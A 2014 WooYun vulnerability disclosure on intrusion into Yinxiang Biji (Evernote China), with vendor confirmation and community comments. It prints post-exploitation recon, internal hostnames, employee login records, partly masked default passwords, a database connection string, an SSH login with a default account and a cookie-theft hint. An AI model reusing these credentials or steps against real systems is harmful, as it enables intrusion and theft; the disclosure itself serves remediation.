当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064640

漏洞标题:对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com)

相关厂商:印象笔记

漏洞作者: 猪猪侠

提交时间:2014-06-12 14:54

修复时间:2014-07-27 14:56

公开时间:2014-07-27 14:56

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-14: 厂商已经确认,细节仅向厂商公开
2014-06-24: 细节向核心白帽子及相关领域专家公开
2014-07-04: 细节向普通白帽子公开
2014-07-14: 细节向实习白帽子公开
2014-07-27: 细节向公众公开

简要描述:

对印象笔记的一次安全测试,浅尝辄止!
结果证明可以突破网络边界,印象笔记中国与美国Evernote.com总部通过VPN互联,直接通过内部VPN网络即可接入美国Evernote.com总部内网,连接内部enops.net的子域。

详细说明:

#1 漏洞成因
一次偶然的机会,扫描器捕捉到如下三个网址存在struts2命令执行漏洞,且可以成功利用
http://119.254.30.40/index.action
https://wechat.yinxiang.com/en/authCallback.action
https://tools.yinxiang.com/wb/auth.action
WEB目录
/opt/tomcat8081/webapps/ROOT/
直接GETSHELL

yinxiang__.jpg


关键信息

# if you run this script manually, please use the sudo -u en-www bash /home/en-www/update-webdata.sh 
cd /home/en-www; git pull origin master
#! /bin/bash
#rollback ROOT.war to the last one.
cp /home/en-www/backup/ROOT.war.last /var/lib/tomcat6/webapps/ROOT.war
/etc/init.d/tomcat restart
Linux app001.wechat 3.2.10-xen #2 SMP Wed Mar 14 07:31:12 PDT 2012 x86_64 GNU/Linux
#
# This file is manged by puppet
#
127.0.0.1	localhost.localdomain localhost
10.192.50.52	app001.wechat.bj1.enops.net app001
; <<>> DiG 9.7.3 <<>> master.wechat.bj1.enops.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23508
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 4, ADDITIONAL: 4
;; QUESTION SECTION:
;master.wechat.bj1.enops.net.	IN	A
;; ANSWER SECTION:
master.wechat.bj1.enops.net. 1800 IN	CNAME	app001.wechat.bj1.enops.net.
app001.wechat.bj1.enops.net. 1800 IN	A	10.192.50.52
;; AUTHORITY SECTION:
bj1.enops.net.		1800	IN	NS	admin001.bj1.enops.net.
bj1.enops.net.		1800	IN	NS	admin002.bj2.enops.net.
bj1.enops.net.		1800	IN	NS	admin002.bj1.enops.net.
bj1.enops.net.		1800	IN	NS	admin001.bj2.enops.net.
;; ADDITIONAL SECTION:
admin001.bj1.enops.net.	1800	IN	A	10.192.9.20
admin001.bj2.enops.net.	1800	IN	A	10.193.9.20
admin002.bj1.enops.net.	1800	IN	A	10.192.9.21
admin002.bj2.enops.net.	1800	IN	A	10.193.9.21
;; Query time: 0 msec
;; SERVER: 10.192.9.20#53(10.192.9.20)
;; WHEN: Fri Jul 19 15:22:58 2013
;; MSG SIZE  rcvd: 242


achen pts/1 vpn-rwc.corp.et**.enops.net


$ last
hxiao    pts/0        10.192.8.28      Fri Jul 19 06:31 - 07:00  (00:28)    
hxiao    pts/0        10.192.8.28      Fri Jul 19 06:08 - 06:16  (00:08)    
hxiao    pts/0        10.192.8.28      Thu Jul 18 04:13 - 07:51  (03:37)    
hxiao    pts/0        10.192.8.28      Wed Jul 17 01:06 - 10:57  (09:51)    
jrevita  pts/1        10.192.8.28      Tue Jul 16 21:55 - 21:57  (00:01)    
gplasky  pts/0        10.192.8.28      Tue Jul 16 21:01 - 00:39  (03:37)    
gplasky  pts/0        10.192.8.28      Tue Jul 16 20:56 - 20:59  (00:03)    
jrevita  pts/1        10.192.8.28      Tue Jul 16 20:55 - 20:58  (00:02)    
gplasky  pts/0        10.192.8.28      Tue Jul 16 20:49 - 20:56  (00:06)    
gplasky  pts/0        10.192.8.28      Tue Jul 16 20:40 - 20:40  (00:00)    
gplasky  pts/0        10.192.8.28      Tue Jul 16 20:29 - 20:39  (00:10)    
fyue     pts/0        10.192.8.23      Tue Jul 16 10:04 - 10:04  (00:00)    
hxiao    pts/0        10.192.8.28      Tue Jul 16 03:38 - 07:14  (03:35)    
hxiao    pts/0        10.192.8.28      Mon Jul 15 02:49 - 10:40  (07:50)    
hxiao    pts/0        10.192.8.28      Mon Jul 15 01:56 - 01:57  (00:00)    
hxiao    pts/1        10.192.8.28      Sun Jul 14 20:08 - 21:12  (01:03)    
hxiao    pts/1        10.192.8.28      Sun Jul 14 19:56 - 20:00  (00:04)    
hxiao    pts/0        10.192.8.28      Sun Jul 14 19:40 - 21:11  (01:31)    
hxiao    pts/1        10.192.8.28      Fri Jul 12 07:59 - 08:27  (00:28)


#3 最最重要的环节来了
印象笔记的所有服务器运维都会通过如下setup.sh来自动化配置,也就是他们的每台服务器都会拥有一个默认账号enops,而且和root密码一样百年不变,ssh端口22022,你懂得!!!

if [ $# -eq 0 ];  then
	echo -e "Usage: $0 hostname\n\tEX: $0 vpn01.enchina"
	exit
fi
hostname=$1
enopspass="yinxian******"
rootpass="xp2********"
#setup hostname
echo "$hostname" > /etc/hostname
echo -e "127.0.0.1\t $hostname" > /etc/hosts
#setup root password
echo -e "${rootpass}\n${rootpass}" | passwd
#setup sshd
sed -i 's/Port 22$/Port 22022/g' /etc/ssh/sshd_config
sed -i 's/PermitRootLogin yes/PermitRootLogin no/g' /etc/ssh/sshd_config 
#update apt source
echo "deb http://mirrors.163.com/debian squeeze main contrib non-free" > /etc/apt/sources.list
aptitude update
#set up enops user
groupadd enops
useradd -m -p `mkpasswd $enopspass` -g enops -s /bin/bash enops 
aptitude install sudo
chmod 644 /etc/sudoers
sed -i '/%sudo/ a\%enops ALL=(ALL) ALL' /etc/sudoers
chmod 440 /etc/sudoers


#4 咱们来远程连接吧

root@kali:~# ssh -p 22022 enops@tools.yinxiang.com
The authenticity of host '[tools.yinxiang.com]:22022 ([115.28.33.231]:22022)' can't be established.
RSA key fingerprint is cc:2e:18:a8:56:c8:32:40:91:a3:b6:c8:7f:8a:7d:a2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[tools.yinxiang.com]:22022,[115.28.33.231]:22022' (RSA) to the list of known hosts.
enops@tools.yinxiang.com's password: 
Linux tools.enchina 2.6.32-5-amd64 #1 SMP Sun Jan 1 04:57:38 CST 2012 x86_64
Welcome to aliyun Elastic Compute Service!
Last login: Tue Mar 25 10:54:24 2014 from 183.81.181.234
enops@tools:~$ whoami
enops


yinxiang.jpg


试下启用一个端口映射,然后批量跨域获取印象笔记的cookie看看?dump you httpOnly cookies!
http://tools.yinxiang.com/

yinxiang1.jpg


yinxiang2.jpg

漏洞证明:

java.sql.Connection conn =
      java.sql.DriverManager
          .getConnection("jdbc:mysql://master.wechat.bj1.enops.net/wechat?user=yinxiang&password=bi***********n&useUnicode=true&characterEncoding=UTF-8");


内网远程一系列运维软件包括 splunk、zabbix,而且Zabbix是有个注入漏洞,可继续内网渗透,但由于是浅尝辄止的测试,就没去尝试了
http://drops.wooyun.org/papers/680

https://10.192.8.26:8000/zh-CN/account/login?return_to=%2Fzh-CN%2F
http://10.192.8.29/nagui/
http://splunk.bj1.enops.net


修复方案:

# 网络边界问题
# 运维默认口令问题

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-14 07:59

厂商回复:


感谢 猪猪侠 的渗透测试! 这是2013年7月stucts2漏洞爆发后,通过structs2漏洞进行的一次渗透,在7月25号我们完成了相应的安全处理. 事后我们对事件进行了回放,通过对系统log和交换机流量的分析,确认这只是一个渗透测试,没有做数据的拷贝和倒出.
印象笔记一直以来对安全非常重视,我们已经成立了安全响应中心(http:///security), 期望能够和各位专家一起不断提升印象笔记的安全性. 欢迎各位提意见和建议到 我爱乌云 .
最后再次感谢 猪猪侠!

最新状态:

2014-06-16:欢迎各位提意见和建议到 security at evernote dot com

漏洞评价:

评论

  1. 2014-06-12 14:56 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    猪猪侠,你这么腻害,米国知道么?

  2. 2014-06-12 14:57 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com) 2014-06-12

  3. 2014-06-12 14:57 | big、face ( 普通白帽子 | Rank:144 漏洞数:36 | |上天请赐我一个洞|想要一件乌云衣服|)

    众测完又出山了

  4. 2014-06-12 14:57 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    是想技术移民?

  5. 2014-06-12 15:01 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com) 2014-06-12

  6. 2014-06-12 15:02 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    我以为是要攻下米国国防局呢

  7. 2014-06-12 15:03 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    越玩越大吖

  8. 2014-06-12 15:04 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    简直高大上

  9. 2014-06-12 15:07 | 那个夏天骚年未老 ( 路人 | Rank:0 漏洞数:2 | 呵呵,呵,呵呵呵)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com)

  10. 2014-06-12 15:08 | 0749orz ( 路人 | Rank:3 漏洞数:4 | 厌了,烦了~~~)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com) 2014-06-12

  11. 2014-06-12 15:08 | 裙下的秘密 ( 实习白帽子 | Rank:83 漏洞数:9 | )

    占座观看吧,V5

  12. 2014-06-12 15:09 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    大牛!

  13. 2014-06-12 15:15 | 我是小号 ( 普通白帽子 | Rank:334 漏洞数:51 | Martin)

    从blog入手?

  14. 2014-06-12 15:19 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    国际黑客

  15. 2014-06-12 15:23 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    牛X

  16. 2014-06-12 15:27 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    让我说什么好......真乃神人也

  17. 2014-06-12 15:34 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    默默的留个名字

  18. 2014-06-12 15:43 | terrying ( 实习白帽子 | Rank:59 漏洞数:15 | 雅蠛蝶)

    为何如此地屌

  19. 2014-06-12 15:47 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker @zeracker 火速围观。。。

  20. 2014-06-12 15:50 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    猪猪侠,你这么腻害,米国知道么?

  21. 2014-06-12 16:07 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    成语用的不错

  22. 2014-06-12 16:13 | 8th ( 路人 | Rank:3 漏洞数:3 | *请输入个人的简要介绍)

    火钳流明

  23. 2014-06-12 16:15 | 哦哦 ( 路人 | Rank:2 漏洞数:1 | 好123,最好的导航,没有之一)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com) 2014-06-12

  24. 2014-06-12 16:16 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  25. 2014-06-12 16:29 | Ricter ( 实习白帽子 | Rank:59 漏洞数:15 | 渣渣一个)

    前排賣瓜子避孕套小板凳

  26. 2014-06-12 16:53 | 帅爆的小烬烬 ( 路人 | Rank:30 漏洞数:25 | 路上有个漂亮妹子和我搭讪,知道我赶着去挖...)

    火钳流明,前排啃瓜子

  27. 2014-06-12 17:57 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    这个牛逼

  28. 2014-06-12 18:12 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com) 2014-06-12

  29. 2014-06-12 18:17 | E7LE ( 路人 | Rank:0 漏洞数:1 | 好激动,这该怎么填写。。。)

    这个不会查水表么?

  30. 2014-06-12 18:20 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    @E7LE http://www.wooyun.org/lawer

  31. 2014-06-12 18:51 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    穿洋过海~~

  32. 2014-06-12 19:12 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    为啥每次猪猪侠提交的漏洞,都是那么牛X,厉害~~~~值得大家思考!

  33. 2014-06-12 21:23 | LauRen ( 路人 | Rank:4 漏洞数:1 | 苦逼屌丝一枚。)

    mark

  34. 2014-06-12 21:36 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    听说洞主是个温柔好脾气、很多时候显得童心未泯、自制力强、明确目标、痴迷于事业,但有时候话很少、略二… 的好少年~

  35. 2014-06-13 15:12 | 49miner ( 路人 | Rank:4 漏洞数:2 | 哈喽)

    你关注的白帽子 猪猪侠 发表了漏洞 对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com) 2014-06-12

  36. 2014-06-13 18:02 | 孤月寒城 ( 路人 | Rank:0 漏洞数:1 )

    你这么屌 你妈妈知道吗

  37. 2014-06-13 18:26 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    控制边界路由器 ,然后搭建vpn 拨号直接进入内网。。对吗?猪哥

  38. 2014-06-13 21:15 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    我能证明猪哥语文不是体育老师交的 :)

  39. 2014-06-13 22:37 | 凌枫 ( 路人 | Rank:4 漏洞数:2 | 菜鸟求罩 _(:з”∠)_)

    火钳

  40. 2014-06-14 01:13 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    彩笔不懂,围观

  41. 2014-06-14 08:02 | 我是小号 ( 普通白帽子 | Rank:334 漏洞数:51 | Martin)

    确认这只是一个渗透测试,没有做数据的拷贝和倒出.

  42. 2014-06-14 09:14 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    围观下

  43. 2014-06-14 12:19 | 刀锋者 ( 路人 | Rank:2 漏洞数:1 | Low-key life, high-profile work...)

    围观

  44. 2014-06-15 01:21 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    呵呵

  45. 2014-06-15 13:19 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    mark

  46. 2014-06-15 14:12 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人,可能走的过程...)

    欢迎各位提意见和建议到 我爱乌云 .

  47. 2014-06-16 14:46 | ak47 ( 路人 | Rank:6 漏洞数:2 | 扫射)

    坐等公开

  48. 2014-06-18 11:45 | 博丽灵梦 ( 路人 | Rank:13 漏洞数:7 | = =cf)

    马可波罗

  49. 2014-06-19 15:45 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    http://www.freebuf.com/news/36865.html 老大是不是你干的。哈哈~~~~

  50. 2014-07-04 10:11 | feng ( 普通白帽子 | Rank:664 漏洞数:79 | 想刷个6D)

    猪哥,猪哥,猪哥,猪哥

  51. 2014-07-14 22:43 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    终于看见了

  52. 2014-07-27 14:57 | 泥嚎嚎 ( 路人 | Rank:6 漏洞数:5 | 我是咩酱.)

    碉堡了

  53. 2014-07-27 15:03 | 阿萨帝 ( 实习白帽子 | Rank:91 漏洞数:68 | 不发礼物的索要联系方式都是耍流氓。)

    这是用的那个扫描器呀??@猪猪侠

  54. 2014-07-27 15:36 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @阿萨帝 …

  55. 2014-07-27 17:29 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    然后批量跨域获取印象笔记的cookie看看?dump you httpOnly cookies! 这里没看懂。 不懂XSS, 不懂怎么获取的。

  56. 2014-07-27 17:50 | 有点小鸡冻 ( 路人 | Rank:12 漏洞数:8 )

    请叫美国总部给你来台迈巴赫!

  57. 2014-07-27 18:08 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @hacker@sina.cn 简单的解释,就是某个qq.com的二级域名被你控制了后,然后*.qq.com的cookie想要拿到的话,那都不是事!!!有了cookie,即可直接登录QQ邮箱、QQ微博、QQ空间

  58. 2014-07-28 13:45 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    @猪猪侠 嗯,了解, 3Q

  59. 2014-08-03 19:51 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    我们已经成立了安全响应中心(http:///security)...打广告失败

  60. 2014-08-22 15:07 | mr_dion ( 路人 | Rank:5 漏洞数:2 | 面临就业大学生)

    我们已经成立了安全响应中心(http:///security)。。。骗谁呢

  61. 2014-09-17 11:54 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    偶然间扫描器扫到漏洞。我关心这个扫描器,大牛,放出来吧!我爱你……

  62. 2015-06-06 20:56 | anting ( 普通白帽子 | Rank:105 漏洞数:38 | 活到老,学到老)

    感谢 猪猪侠 的渗透测试! 这是2013年7月stucts2漏洞爆发后,通过structs2漏洞进行的一次渗透,在7月25号我们完成了相应的安全处理. 事后我们对事件进行了回放,通过对系统log和交换机流量的分析,确认这只是一个渗透测试,没有做数据的拷贝和倒出.这就是黑客精神啊赞一个